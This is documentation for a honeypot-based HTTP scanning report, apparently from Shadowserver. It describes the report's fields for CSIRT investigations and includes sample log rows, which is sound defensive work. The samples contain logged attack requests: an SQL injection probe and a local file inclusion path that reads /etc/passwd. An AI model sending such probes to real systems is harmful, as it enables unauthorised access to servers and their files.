HTTP Scanners Report

This report identifies hosts that have been observed performing HTTP-based scanning activity.

HTTP scanning may be a benign activity — for example, it may be a search engine indexing the web, a research project, or an organization like the Shadowserver Foundation looking for open or vulnerable services that it can report to National CERTs and network owners so that they can remediate their networks.

Other scans, however, may be part of a network reconnaissance in the preparatory phase of an attack. The scan itself may also perform an attack, such as an SQL injection, a Remote File Inclusion or Local File Inclusion attack, or the specific exploit of a vulnerability. Quite often, scanning activity may come from a botnet that is actively looking to infect new sites or devices.

Below is a description of a report based on data collected by SISSDEN HTTP-aware honeypots. In addition to registering the source of the scan, it logs the request of the scan in raw form and attempts to match a pattern to it. In cases where a malicious artifact was collected by the honeypot, its MD5 and SHA256 hash are also recorded. This information may be used to support an investigation by a CSIRT into an incident and determine its true nature.

This report type was created as part of the EU Horizon 2020 SISSDEN Project.

Fields

  • timestamp
    Time that the scan was performed in UTC+0
  • ip
    The IP address performing the scan
  • port
    The source port used in the scan
  • asn
    ASN announcing the scanning IP
  • geo
    Country where the scanning IP resides
  • region
    State / Province / Administrative region where the scanning IP resides
  • city
    ASN of where the scanning IP resides
  • hostname
    PTR record of the scanning IP
  • type
    Type of activity observed; i.e. http-scan
  • dst_ip
    The IP address of the target device
  • dst_port
    Destination port used in the scan
  • dst_asn
    ASN announcing the target IP
  • dst_geo
    Country where the target IP resides
  • dst_dns
    FQDN of the target, if applicable and recorded
  • naics
    North American Industry Classification System Code of the scanning IP
  • sic
    Standard Industrial Classification System Code of the scanning IP
  • sector
    Sector to which the attacking IP belongs
  • dst_sector
    Sector to which the target IP belongs
  • public_source
    Source of the data, for cases where the source accepts being credited
  • sensorid
    ID of sensor target device
  • pattern
    Request pattern if recognized by target sensor (e.g., does it match an RFI, LFI, SQLi … )
  • url
    URL being requested by the scanning IP
  • file_md5
    MD5 hash of file downloaded, if any
  • file_sha256
    SHA256 hash of file downloaded, if any
  • request_raw
    Raw request sent by the scanning IP

Sample

timestamp,ip,port,asn,geo,region,city,hostname,type,dst_ip,dst_port,dst_asn,dst_geo,dst_dns,naics,sic,sector,dst_sector,public_source,sensorid,pattern,url,file_md5,file_sha256,request_raw
"2018-08-29 00:00:05",198.51.100.5,52513,27668,EC,AZUAY,CUENCA,198-51-100-5.example.net,http-scan,203.0.113.6,80,17169,AT,,0,0,,,SISSDEN,53c1549f-f806-4b82-8b3a-6673456cd40f,unknown,/,,,"GET / HTTP/1.1rnHost: 203.0.113.6rnUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
"2018-08-29 00:04:08",198.51.100.3,33418,23033,US,WASHINGTON,EVERETT,,http-scan,203.0.113.217,80,56630,RU,,0,0,Communications,,SISSDEN,5800ff5d-277e-48aa-b904-0997a00c6a37,unknown,/axis-cgi/aol%2A/_do/rss_popup?blogID=,,,"GET /axis-cgi/aol%2A/_do/rss_popup?blogID= HTTP/1.1rnAccept: */*rnAccept-Charset: utf-8;q=0.7,iso-8859-1;q=0.2,*;q=0.1rnHost: 203.0.113.217rnUser-Agent: Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
"2018-08-29 01:27:53”,198.51.100.100,62868,36903,MA,SOUSS-MASSA-DRAA,AGADIR,,http-scan,203.0.113.200,80,203525,RO,,0,0,,,SISSDEN,2447a8e1-237d-4d37-b09f-23f6f30e58c2,sqli,/cgi-bin/perl/index3.php?destino=%22%20and%20%22x%22%3D%22y,,,"GET /cgi-bin/perl/index3.php?destino=%22%20and%20%22x%22%3D%22y HTTP/1.1rnAccept: */*rnConnection: ClosernHost: 203.0.113.200rnUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
"2018-08-29 16:23:32”,198.51.100.105,32886,29238,AL,DURRES,DURRES,host105.example.com,http-scan,203.0.113.215,80,16276,EG,,0,0,,Other,SISSDEN,12b9d177-0eb5-4324-8e48-5ed5b868b9f4,lfi,/jaf/index.php?show=../../../etc/passwd,,,"GET /jaf/index.php?show=../../../etc/passwd HTTP/1.1rnAccept-Encoding: identityrnConnection: closernHost: recitepoke.daternUser-Agent: fimap.googlecode.com/v1.00_svn (My life for Aiur)"
"2018-08-29 23:58:40”,198.51.100.170,20563,37963,CN,,HANGZHOU,,http-scan,203.0.113.217,80,55720,MY,,0,0,Communications,Communications,SISSDEN,112ded91-f0be-447f-b93d-5a18522b84ea,unknown,/wpo.php,,,"GET /wpo.php HTTP/1.1rnCache-Control: no-cachernConnection: Keep-AlivernHost: 203.0.113.217rnUser-Agent: Mozilla/5.0"

Our 76 Report Types